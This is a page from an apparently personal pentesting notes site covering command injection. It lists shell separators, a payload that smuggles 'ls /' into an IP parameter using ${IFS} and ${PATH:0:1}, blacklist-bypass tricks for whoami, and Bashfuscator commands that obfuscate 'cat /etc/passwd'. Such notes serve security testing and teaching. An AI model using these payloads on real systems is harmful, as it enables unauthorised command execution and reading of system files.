Programmerboy Pentesting Stuff
  • Welcome
  • Web Pentesting Stuff
    • Pentesting Port 80,443
      • FFUF Commands
      • Virtual Host Scanning
      • Javascript DeObfuscation
      • Pentesting JWT (JSON Web Tokens)
      • Pentesting Graphql
      • Pentesting Redis 6379
  • CMS Pentesting
    • Wordpress Pentesting
    • Jenkins
    • Grafana
  • Network Penetration Testing
    • Nmap Commands
    • 53 - Pentesting DNS
    • 88 - Pentesting Kerberos
    • 111 - Pentesting RPC
    • 389 - Pentesting LDAP
    • 445 - Pentesting SMB
    • 873 - Pentesting Rsync
    • 1433 - Pentesting MSSQL
    • 2049 - Pentesting NFS
    • 3389 Pentesting RDP
    • 3306 - Pentesting Mysql
    • 5000 - Pentesting Docker Registry
  • Active Directory Pentesting
    • Methodology
  • Password and Bruteforce Attacks
    • Hydra
    • Cewl
    • Making Custom Wordlists (Usernames)
    • JSON to txt Wordlist
  • Linux Privilege Escalation
    • Getting a Fully Interactive TTY Shell
    • Docker Container Escape
  • Windows Privilege Escalation
    • Tunneling and Pivoting
    • Methodology
  • Bug Bounty
    • Bug Bounty Methodology
    • XSS
    • SQL Injection
    • Command Injection
    • File Upload Pentesting
    • Local and Remote File Inclusion
    • Broken Authentication
    • Server Side Request Forgery (SSRF)
    • XML External Entity (XXE)
    • Server Side Template Injection (SSTI)
    • ReconFTW (six2dez)
    • JS Files
    • SignUp Page
  • CTFs
    • WEB
    • Regex Bypass
    • Grep & Regex & Find strings
  • Python Programs for Pentesting
    • Python Code Snippets
  • Certifications-Notes
    • CRTO & Cobalt Strike
  • Phishing and Real World Stuff
    • Email Spoofing
    • Attacking Office 365 & Exchange
  • Cloud Pentesting
    • Enumeration
Powered by GitBook
On this page
  • Basic Command Injection
  • Advanced Command Injection
  • When Space,and paths(/etc/passwd, /, /home ) are not Allowed
  • Bypassing Blacklists(whoami,pwd,ls,cat)
  • Automated Obfuscation Tool for Command Injection
  • BashFuscator
  1. Bug Bounty

Command Injection

Basic Command Injection 

;      # semi colon
\n     # New Line %0a
&      # background
|      # pipe
&&     # AND
||     # OR
``     # Sub Shell (backticks)
$()    # Sub-Shell

Advanced Command Injection

When Space,and paths(/etc/passwd, /, /home ) are not Allowed

# %0a is new line
# ls will list the file
# ${IFS} when space is blacklisted
# ${PATH:0:1} it will grab / from path variables

ip=127.0.0.150%0als${IFS}${PATH:0:1} 

# Final Command Becomes

127.0.0.1
ls /

Bypassing Blacklists(whoami,pwd,ls,cat)

who$@ami
w`h`o`a`mi  # should be even

Automated Obfuscation Tool for Command Injection

BashFuscator

we can use this tool to obfuscate our command

bashfuscator -c "cat /etc/passwd"

it will give very huge payload, to make it short we can use below command

bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1
PreviousSQL InjectionNextFile Upload Pentesting

Last updated 11 months ago

LogoGitHub - Bashfuscator/Bashfuscator: A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.GitHub